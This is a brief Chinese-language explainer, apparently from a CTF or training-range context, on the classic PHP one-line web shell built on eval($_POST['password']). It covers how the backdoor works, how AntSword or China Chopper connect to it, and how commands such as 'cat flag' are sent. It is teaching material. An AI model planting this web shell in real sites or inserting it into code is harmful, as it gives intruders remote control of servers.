1 | <?php @eval($_POST['password']);?> |
编写其用到的语言为php语言
这是一个php脚本
“< ? ? >” 是 PHP 的短标签形式,它是一种用于嵌入 PHP 代码的语法
它包含了一个 eval() 函数,eval() 函数可以接受一个字符串作为参数,将其解析为 PHP 代码并执行
在这个过程中使用了 “@” 符号来抑制可能出现的错误信息输出,从而避免了可能会暴露敏感信息的错误提示
也就是说,“password”这个内容可更改
而且“password”被eval()函数接收了
利用 中国蚁剑 或者 中国菜刀 等渗透测试工具即可注入一句话木马来远程连接控制网站,以达到入侵目的
以中国蚁剑为例,“password”即为其连接密码
使用中国蚁剑黑入靶场的例子如下:
具体讲一下被eval接收是什么意思:
eval 中的“password”其实只是一个参数名称,
password 这个参数被用post方法接收了
password这个参数可以传入一些控制命令
比如:
password= cat flag/
则相当于post接受了“cat flag”这个命令